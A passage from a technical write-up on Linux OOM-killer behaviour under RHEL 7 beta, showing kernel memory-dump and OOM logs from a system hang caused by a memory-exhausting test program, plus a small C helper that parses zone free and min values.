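systemd was introduced, and much of the processing, including the starting and stopping of daemon processes, came under the control of systemd. In addition, the default file system, which was ext4 in RHEL 6, became xfs in RHEL 7.

"On RHEL 6 I was able to get almost every daemon process killed. Does the same thing happen on RHEL 7?"

So I tried it on RHEL 7 beta with a GUI environment installed, but...

When I ran the reproducer on RHEL 7 beta, something was not right.

I had expected a burst of OOM killer invocations to kill almost every process, but instead the whole system sometimes froze before the OOM killer was invoked, and sometimes froze after the OOM killer was invoked.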

---------- Example of a hang before the OOM killer was invoked: begin ----------

(After starting pipe-memeater2 I waited about a minute, but there was no response, so I used SysRq-m to display the memory state.)

[ 143.112366] SysRq : Show Memory

[ 143.114964] Mem-Info:

[ 143.116515] Node 0 DMA per-cpu:

[ 143.118718] CPU 0: hi: 0, btch: 1 usd: 0

[ 143.121888] CPU 1: hi: 0, btch: 1 usd: 0

[ 143.125057] CPU 2: hi: 0, btch: 1 usd: 0

[ 143.128223] CPU 3: hi: 0, btch: 1 usd: 0

[ 143.131423] Node 0 DMA32 per-cpu:

[ 143.133751] CPU 0: hi: 186, btch: 31 usd: 0

[ 143.136898] CPU 1: hi: 186, btch: 31 usd: 0

[ 143.140448] CPU 2: hi: 186, btch: 31 usd: 0

[ 143.141648] CPU 3: hi: 186, btch: 31 usd: 0

[ 143.142848] active_anon:94430 inactive_anon:2419 isolated_anon:0

[ 143.142848] active_file:25 inactive_file:27 isolated_file:46

[ 143.142848] unevictable:0 dirty:25 writeback:0 unstable:0

[ 143.142848] free:13044 slab_reclaimable:5548 slab_unreclaimable:8850

[ 143.142848] mapped:856 shmem:2589 pagetables:5786 bounce:0

[ 143.142848] free_cma:0

[ 143.150637] Node 0 DMA free:7568kB min:384kB low:480kB high:576kB active_anon:3188kB inactive_anon:112kB active_file:0kB inactive_file:24kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:16kB shmem:124kB slab_reclaimable:144kB slab_unreclaimable:300kB kernel_stack:16kB pagetables:248kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no

[ 143.160561] lowmem_reserve[]: 0 1802 1802 1802

[ 143.161866] Node 0 DMA32 free:44608kB min:44668kB low:55832kB high:67000kB active_anon:374532kB inactive_anon:9564kB active_file:100kB inactive_file:84kB unevictable:0kB isolated(anon):0kB isolated(file):184kB present:2080640kB managed:1845300kB mlocked:0kB dirty:100kB writeback:0kB mapped:3408kB shmem:10232kB slab_reclaimable:22048kB slab_unreclaimable:35100kB kernel_stack:5296kB pagetables:22896kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no

[ 143.172186] lowmem_reserve[]: 0 0 0 0

[ 143.172895] Node 0 DMA: 50*4kB (UM) 46*8kB (M) 30*16kB (M) 18*32kB (M) 11*64kB (UM) 5*128kB (UM) 0*256kB 1*512kB (U) 0*1024kB 2*2048kB (MR) 0*4096kB = 7576kB

[ 143.175751] Node 0 DMA32: 3297*4kB (UEM) 1562*8kB (UEM) 647*16kB (UEM) 135*32kB (UEM) 4*64kB (UEM) 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 44708kB

[ 143.178506] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB

[ 143.180035] 2666 total pagecache pages

[ 143.180639] 0 pages in swap cache

[ 143.181175] Swap cache stats: add 0, delete 0, find 0/0

[ 143.182004] Free swap = 0kB

[ 143.182471] Total swap = 0kB

[ 143.185995] 524287 pages RAM

[ 143.186492] 54799 pages reserved

[ 143.187047] 527642 pages shared

[ 143.187555] 453340 pages non-shared

(The free: value of DMA32 is already below min:, yet the OOM killer has not been invoked, so I used SysRq-f to invoke the OOM killer.)

[ 160.509185] SysRq : Manual OOM execution

[ 160.512561] kworker/0:2 invoked oom-killer: gfp_mask=0xd0, order=0, oom_score_adj=0

[ 160.517679] kworker/0:2 cpuset=/ mems_allowed=0

[ 160.520700] CPU: 0 PID: 185 Comm: kworker/0:2 Not tainted 3.10.0-123.el7.x86_64 #1

[ 160.525619] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013

[ 160.532031] Workqueue: events moom_callback

[ 160.533408] ffff880036c24fa0 000000007dd3d9cb ffff880036dd1c70 ffffffff815e19ba

[ 160.535875] ffff880036dd1d00 ffffffff815dd02d ffff88005f108bf0 ffff88005f108bf0

[ 160.538324] ffff88007f674580 ffff88007f674ea8 ffff880036dd1d98 0000000000000046

[ 160.540795] Call Trace:

[ 160.541572] [<ffffffff815e19ba>] dump_stack+0x19/0x1b

[ 160.543176] [<ffffffff815dd02d>] dump_header+0x8e/0x214

[ 160.544824] [<ffffffff8114520e>] oom_kill_process+0x24e/0x3b0

[ 160.546618] [<ffffffff81144d76>] ? find_lock_task_mm+0x56/0xc0

[ 160.548444] [<ffffffff8106af3e>] ? has_capability_noaudit+0x1e/0x30

[ 160.550420] [<ffffffff81145a36>] out_of_memory+0x4b6/0x4f0

[ 160.552152] [<ffffffff8137bc3d>] moom_callback+0x4d/0x50

[ 160.553828] [<ffffffff8107e02b>] process_one_work+0x17b/0x460

[ 160.555643] [<ffffffff8107edfb>] worker_thread+0x11b/0x400

[ 160.557365] [<ffffffff8107ece0>] ? rescuer_thread+0x400/0x400

[ 160.559215] [<ffffffff81085aef>] kthread+0xcf/0xe0

[ 160.560758] [<ffffffff81085a20>] ? kthread_create_on_node+0x140/0x140

[ 160.562806] [<ffffffff815f206c>] ret_from_fork+0x7c/0xb0

[ 160.563824] [<ffffffff81085a20>] ? kthread_create_on_node+0x140/0x140

[ 160.564921] Mem-Info:

[ 160.565325] Node 0 DMA per-cpu:

[ 160.565860] CPU 0: hi: 0, btch: 1 usd: 0

[ 160.566631] CPU 1: hi: 0, btch: 1 usd: 0

[ 160.567617] CPU 2: hi: 0, btch: 1 usd: 0

[ 160.568414] CPU 3: hi: 0, btch: 1 usd: 0

[ 160.569198] Node 0 DMA32 per-cpu:

[ 160.569771] CPU 0: hi: 186, btch: 31 usd: 0

[ 160.570542] CPU 1: hi: 186, btch: 31 usd: 0

[ 160.571392] CPU 2: hi: 186, btch: 31 usd: 0

[ 160.572164] CPU 3: hi: 186, btch: 31 usd: 0

[ 160.572948] active_anon:94430 inactive_anon:2419 isolated_anon:0

[ 160.572948] active_file:25 inactive_file:27 isolated_file:46

[ 160.572948] unevictable:0 dirty:25 writeback:0 unstable:0

[ 160.572948] free:13044 slab_reclaimable:5548 slab_unreclaimable:8850

[ 160.572948] mapped:856 shmem:2589 pagetables:5786 bounce:0

[ 160.572948] free_cma:0

[ 160.578891] Node 0 DMA free:7568kB min:384kB low:480kB high:576kB active_anon:3188kB inactive_anon:112kB active_file:0kB inactive_file:24kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:16kB shmem:124kB slab_reclaimable:144kB slab_unreclaimable:300kB kernel_stack:16kB pagetables:248kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no

[ 160.585529] lowmem_reserve[]: 0 1802 1802 1802

[ 160.586429] Node 0 DMA32 free:44608kB min:44668kB low:55832kB high:67000kB active_anon:374532kB inactive_anon:9564kB active_file:100kB inactive_file:84kB unevictable:0kB isolated(anon):0kB isolated(file):184kB present:2080640kB managed:1845300kB mlocked:0kB dirty:100kB writeback:0kB mapped:3408kB shmem:10232kB slab_reclaimable:22048kB slab_unreclaimable:35100kB kernel_stack:5296kB pagetables:22896kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no

[ 160.593312] lowmem_reserve[]: 0 0 0 0

[ 160.594029] Node 0 DMA: 50*4kB (UM) 46*8kB (M) 30*16kB (M) 18*32kB (M) 11*64kB (UM) 5*128kB (UM) 0*256kB 1*512kB (U) 0*1024kB 2*2048kB (MR) 0*4096kB = 7576kB

[ 160.596790] Node 0 DMA32: 3297*4kB (UEM) 1562*8kB (UEM) 647*16kB (UEM) 135*32kB (UEM) 4*64kB (UEM) 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 44708kB

[ 160.599652] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB

[ 160.601103] 2666 total pagecache pages

[ 160.601703] 0 pages in swap cache

[ 160.602691] Swap cache stats: add 0, delete 0, find 0/0

[ 160.603580] Free swap = 0kB

[ 160.604072] Total swap = 0kB

[ 160.607456] 524287 pages RAM

[ 160.607980] 54799 pages reserved

[ 160.608499] 527635 pages shared

[ 160.609024] 453340 pages non-shared

[ 160.609599] [ pid ] uid tgid total_vm rss nr_ptes swapents oom_score_adj name

[ 160.610967] [ 572] 0 572 9232 522 19 0 0 systemd-journal

[ 160.612373] [ 591] 0 591 29620 80 25 0 0 lvmetad

[ 160.613750] [ 613] 0 613 11094 414 22 0 -1000 systemd-udevd

[ 160.615158] [ 707] 0 707 12803 102 24 0 -1000 auditd

[ 160.616465] [ 720] 0 720 20056 16 9 0 0 audispd

[ 160.618066] [ 729] 0 729 4189 43 13 0 0 alsactl

[ 160.619369] [ 730] 0 730 6551 49 18 0 0 sedispatch

[ 160.620697] [ 732] 172 732 41164 55 16 0 0 rtkit-daemon

[ 160.622183] [ 734] 0 734 6612 86 16 0 0 systemd-logind

[ 160.623558] [ 735] 0 735 61592 373 63 0 0 vmtoolsd

[ 160.624863] [ 739] 0 739 80894 4240 77 0 0 firewalld

[ 160.626244] [ 745] 995 745 2133 36 9 0 0 lsmd

[ 160.627506] [ 746] 0 746 96840 194 40 0 0 accounts-daemon

[ 160.628884] [ 747] 0 747 84088 287 66 0 0 ModemManager

[ 160.630335] [ 749] 0 749 32515 128 19 0 0 smartd

[ 160.631591] [ 752] 994 752 28961 92 28 0 0 chronyd

[ 160.632883] [ 756] 0 756 71323 513 39 0 0 rsyslogd

[ 160.634400] [ 757] 0 757 52615 443 53 0 0 abrtd

[ 160.635671] [ 759] 0 759 51993 340 54 0 0 abrt-watch-log

[ 160.637062] [ 760] 32 760 16227 131 35 0 0 rpcbind

[ 160.638471] [ 763] 0 763 51993 341 50 0 0 abrt-watch-log

[ 160.639847] [ 766] 0 766 1094 23 8 0 0 rngd

[ 160.641159] [ 768] 0 768 4829 78 14 0 0 irqbalance

[ 160.642469] [ 770] 81 770 7580 425 19 0 -900 dbus-daemon

[ 160.643811] [ 777] 0 777 50842 115 39 0 0 gssproxy

[ 160.645177] [ 807] 70 807 7549 77 20 0 0 avahi-daemon

[ 160.646534] [ 815] 0 815 28811 58 11 0 0 ksmtuned

[ 160.647818] [ 816] 0 816 26974 22 10 0 0 sleep

[ 160.649127] [ 817] 999 817 132837 2083 57 0 0 polkitd

[ 160.650499] [ 818] 70 818 7518 60 18 0 0 avahi-daemon

[ 160.651906] [ 880] 0 880 113613 994 74 0 0 NetworkManager

[ 160.653405] [ 1077] 0 1077 13266 145 28 0 0 wpa_supplicant

[ 160.654788] [ 1198] 0 1198 27631 3113 56 0 0 dhclient

[ 160.656100] [ 1408] 0 1408 138261 2652 87 0 0 tuned

[ 160.657411] [ 1409] 0 1409 20640 213 42 0 -1000 sshd

[ 160.658661] [ 1416] 0 1416 138875 1130 141 0 0 libvirtd

[ 160.659944] [ 1422] 0 1422 31583 150 18 0 0 crond

[ 160.661296] [ 1423] 0 1423 6491 49 16 0 0 atd

[ 160.662511] [ 1424] 0 1424 118308 759 51 0 0 gdm

[ 160.663729] [ 1427] 0 1427 27509 31 11 0 0 agetty

[ 160.665053] [ 2285] 0 2285 61020 4487 104 0 0 Xorg

[ 160.666283] [ 2567] 0 2567 23306 253 44 0 0 master

[ 160.667674] [ 2568] 89 2568 23332 252 45 0 0 pickup

[ 160.669045] [ 2569] 89 2569 23349 251 45 0 0 qmgr

[ 160.670312] [ 2580] 0 2580 64751 993 57 0 -900 abrt-dbus

[ 160.671620] [ 2707] 99 2707 3888 48 11 0 0 dnsmasq

[ 160.672985] [ 2708] 0 2708 3881 45 10 0 0 dnsmasq

[ 160.674256] [ 2746] 0 2746 90874 322 61 0 0 upowerd

[ 160.675546] [ 2770] 997 2770 101041 371 50 0 0 colord

[ 160.676902] [ 2778] 42 2778 111507 299 75 0 0 pulseaudio

[ 160.678231] [ 2791] 0 2791 4975 48 14 0 0 systemd-localed

[ 160.679607] [ 2828] 0 2828 101278 258 47 0 0 packagekitd

[ 160.681005] [ 2870] 0 2870 92702 783 45 0 0 udisksd

[ 160.682294] [ 2913] 0 2913 80155 235 56 0 -900 realmd

[ 160.683551] [ 2976] 0 2976 93324 821 70 0 0 gdm-session-wor

[ 160.685488] [ 2992] 1000 2992 97458 200 40 0 0 gnome-keyring-d

[ 160.687246] [ 3034] 1000 3034 162279 508 112 0 0 gnome-session

[ 160.688795] [ 3041] 1000 3041 3488 36 10 0 0 dbus-launch

[ 160.690170] [ 3042] 1000 3042 7460 298 17 0 0 dbus-daemon

[ 160.691540] [ 3106] 1000 3106 76642 165 36 0 0 gvfsd

[ 160.692986] [ 3110] 1000 3110 90285 685 44 0 0 gvfsd-fuse

[ 160.694345] [ 3178] 1000 3178 13216 144 26 0 0 ssh-agent

[ 160.695703] [ 3194] 1000 3194 84999 151 34 0 0 at-spi-bus-laun

[ 160.697166] [ 3198] 1000 3198 7171 108 18 0 0 dbus-daemon

[ 160.698535] [ 3201] 1000 3201 32423 159 32 0 0 at-spi2-registr

[ 160.700025] [ 3213] 1000 3213 308215 2987 217 0 0 gnome-settings-

[ 160.701605] [ 3230] 1000 3230 119864 373 93 0 0 pulseaudio

[ 160.702984] [ 3236] 0 3236 9863 91 23 0 0 bluetoothd

[ 160.704616] [ 3248] 0 3248 4972 49 13 0 0 systemd-hostnam

[ 160.706041] [ 3250] 1000 3250 399482 27809 312 0 0 gnome-shell

[ 160.707405] [ 3263] 0 3263 47748 273 47 0 0 cupsd

[ 160.708758] [ 3287] 1000 3287 129195 382 96 0 0 gsd-printer

[ 160.710124] [ 3317] 1000 3317 117500 523 49 0 0 ibus-daemon

[ 160.711601] [ 3322] 1000 3322 98216 174 44 0 0 ibus-dconf

[ 160.713041] [ 3324] 1000 3324 113063 487 104 0 0 ibus-x11

[ 160.714394] [ 3329] 1000 3329 132651 1039 79 0 0 gnome-shell-cal

[ 160.715891] [ 3337] 1000 3337 80472 397 57 0 0 mission-control

[ 160.717428] [ 3341] 1000 3341 143879 597 92 0 0 caribou

[ 160.718742] [ 3343] 1000 3343 178351 1094 144 0 0 goa-daemon

[ 160.720151] [ 3358] 1000 3358 83626 372 90 0 0 goa-identity-se

[ 160.721577] [ 3382] 1000 3382 100148 245 48 0 0 gvfs-udisks2-vo

[ 160.723002] [ 3393] 1000 3393 105443 809 54 0 0 gvfs-afc-volume

[ 160.724476] [ 3399] 1000 3399 167235 855 154 0 0 evolution-sourc

[ 160.725990] [ 3406] 1000 3406 78121 167 37 0 0 gvfs-mtp-volume

[ 160.727476] [ 3412] 1000 3412 74935 139 33 0 0 gvfs-goa-volume

[ 160.728902] [ 3419] 1000 3419 80390 181 44 0 0 gvfs-gphoto2-vo

[ 160.730326] [ 3435] 1000 3435 215425 2108 157 0 0 nautilus

[ 160.731786] [ 3446] 1000 3446 182851 1697 136 0 0 tracker-extract

[ 160.733214] [ 3447] 1000 3447 94351 915 125 0 0 vmtoolsd

[ 160.734650] [ 3448] 1000 3448 117460 674 74 0 0 tracker-miner-a

[ 160.736095] [ 3449] 1000 3449 117430 623 75 0 0 tracker-miner-u

[ 160.737520] [ 3451] 1000 3451 140588 1248 82 0 0 tracker-miner-f

[ 160.739047] [ 3460] 1000 3460 134177 1162 66 0 0 tracker-store

[ 160.740605] [ 3462] 1000 3462 112871 1244 135 0 0 abrt-applet

[ 160.741951] [ 3550] 1000 3550 37459 108 31 0 0 gconfd-2

[ 160.743318] [ 3565] 1000 3565 79800 168 42 0 0 ibus-engine-sim

[ 160.744710] [ 3587] 1000 3587 117863 187 47 0 0 gvfsd-trash

[ 160.746059] [ 3624] 1000 3624 267938 9317 185 0 0 evolution-calen

[ 160.747531] [ 3630] 1000 3630 59682 143 38 0 0 gvfsd-metadata

[ 160.748929] [ 3649] 1000 3649 138689 1816 121 0 0 gnome-terminal-

[ 160.750307] [ 3652] 1000 3652 2122 32 9 0 0 gnome-pty-helpe

[ 160.751902] [ 3653] 1000 3653 29140 406 14 0 0 bash

[ 160.753144] [ 3695] 1000 3695 1042 21 7 0 1 pipe-memeater2

[ 160.754680] [ 3696] 1000 3696 1042 21 7 0 1 pipe-memeater2

[ 160.756054] [ 3697] 1000 3697 1042 21 7 0 1 pipe-memeater2

[ 160.757442] [ 3698] 1000 3698 1042 21 7 0 1 pipe-memeater2

[ 160.758876] [ 3699] 1000 3699 1042 21 7 0 1 pipe-memeater2

[ 160.760282] [ 3700] 1000 3700 1042 21 7 0 1 pipe-memeater2

[ 160.761678] [ 3701] 1000 3701 1042 21 7 0 1 pipe-memeater2

[ 160.763303] [ 3702] 1000 3702 1042 21 7 0 1 pipe-memeater2

[ 160.764761] [ 3703] 1000 3703 1042 21 7 0 1 pipe-memeater2

[ 160.766153] [ 3704] 1000 3704 1042 21 7 0 1 pipe-memeater2

[ 160.767683] [ 3706] 1000 3706 1042 21 7 0 0 pipe-memeater2

[ 160.769049] Out of memory: Kill process 3250 (gnome-shell) score 59 or sacrifice child

[ 160.770424] Killed process 3317 (ibus-daemon) total-vm:470000kB, anon-rss:2092kB, file-rss:0kB

(There was still no response, so I used SysRq-m to display the memory state.)

[ 196.095694] SysRq : Show Memory

[ 196.098000] Mem-Info:

[ 196.099641] Node 0 DMA per-cpu:

[ 196.101846] CPU 0: hi: 0, btch: 1 usd: 0

[ 196.105035] CPU 1: hi: 0, btch: 1 usd: 0

[ 196.109063] CPU 2: hi: 0, btch: 1 usd: 0

[ 196.112459] CPU 3: hi: 0, btch: 1 usd: 0

[ 196.115794] Node 0 DMA32 per-cpu:

[ 196.118128] CPU 0: hi: 186, btch: 31 usd: 0

[ 196.121276] CPU 1: hi: 186, btch: 31 usd: 0

[ 196.124455] CPU 2: hi: 186, btch: 31 usd: 0

[ 196.126846] CPU 3: hi: 186, btch: 31 usd: 0

[ 196.128674] active_anon:94430 inactive_anon:2419 isolated_anon:0

[ 196.128674] active_file:25 inactive_file:27 isolated_file:46

[ 196.128674] unevictable:0 dirty:25 writeback:0 unstable:0

[ 196.128674] free:13046 slab_reclaimable:5548 slab_unreclaimable:8850

[ 196.128674] mapped:856 shmem:2589 pagetables:5786 bounce:0

[ 196.128674] free_cma:0

[ 196.140606] Node 0 DMA free:7568kB min:384kB low:480kB high:576kB active_anon:3188kB inactive_anon:112kB active_file:0kB inactive_file:24kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:16kB shmem:124kB slab_reclaimable:144kB slab_unreclaimable:300kB kernel_stack:16kB pagetables:248kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no

[ 196.155788] lowmem_reserve[]: 0 1802 1802 1802

[ 196.157371] Node 0 DMA32 free:44616kB min:44668kB low:55832kB high:67000kB active_anon:374532kB inactive_anon:9564kB active_file:100kB inactive_file:84kB unevictable:0kB isolated(anon):0kB isolated(file):184kB present:2080640kB managed:1845300kB mlocked:0kB dirty:100kB writeback:0kB mapped:3408kB shmem:10232kB slab_reclaimable:22048kB slab_unreclaimable:35100kB kernel_stack:5288kB pagetables:22896kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no

[ 196.164536] lowmem_reserve[]: 0 0 0 0

[ 196.165466] Node 0 DMA: 50*4kB (UM) 46*8kB (M) 30*16kB (M) 18*32kB (M) 11*64kB (UM) 5*128kB (UM) 0*256kB 1*512kB (U) 0*1024kB 2*2048kB (MR) 0*4096kB = 7576kB

[ 196.168336] Node 0 DMA32: 3297*4kB (UEM) 1564*8kB (UEM) 647*16kB (UEM) 135*32kB (UEM) 4*64kB (UEM) 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 44724kB

[ 196.171141] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB

[ 196.172490] 2666 total pagecache pages

[ 196.173179] 0 pages in swap cache

[ 196.173715] Swap cache stats: add 0, delete 0, find 0/0

[ 196.174547] Free swap = 0kB

[ 196.175015] Total swap = 0kB

[ 196.178556] 524287 pages RAM

[ 196.179082] 54799 pages reserved

[ 196.179605] 527628 pages shared

[ 196.180114] 453338 pages non-shared

(The free: value of DMA32 is still below min:, yet the OOM killer has not been invoked, so I used SysRq-b to reboot.)

[ 208.678839] SysRq : Resetting

---------- Example of a hang before the OOM killer was invoked: end ----------
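
The annotations in the log above compare the DMA32 zone's `free:` value with its `min:` value. As a minimal sketch of that check, the following extracts the two fields from one per-zone line of the Mem-Info output. The helper name `zone_below_min` is hypothetical, and the comparison is only the rule of thumb used in the annotations, not the kernel's complete condition for invoking the OOM killer.

```c
#include <stdio.h>
#include <string.h>

/*
 * Hypothetical helper: parse "free:<n>kB" and "min:<n>kB" from one
 * per-zone line such as "Node 0 DMA32 free:44608kB min:44668kB ...".
 * Returns 1 if free is below min, 0 if it is not, and -1 if the line
 * does not contain both fields.
 */
int zone_below_min(const char *line, long *free_kb, long *min_kb)
{
	/* The leading space keeps "free_cma:" and similar fields from matching. */
	const char *f = strstr(line, " free:");
	const char *m = strstr(line, " min:");

	if (!f || !m)
		return -1;
	if (sscanf(f, " free:%ldkB", free_kb) != 1 ||
	    sscanf(m, " min:%ldkB", min_kb) != 1)
		return -1;
	return *free_kb < *min_kb;
}
```

Fed the DMA32 line logged at 143.161866 (free:44608kB, min:44668kB), the helper reports that free is below min, which matches the situation described in the annotation that precedes the SysRq-f step.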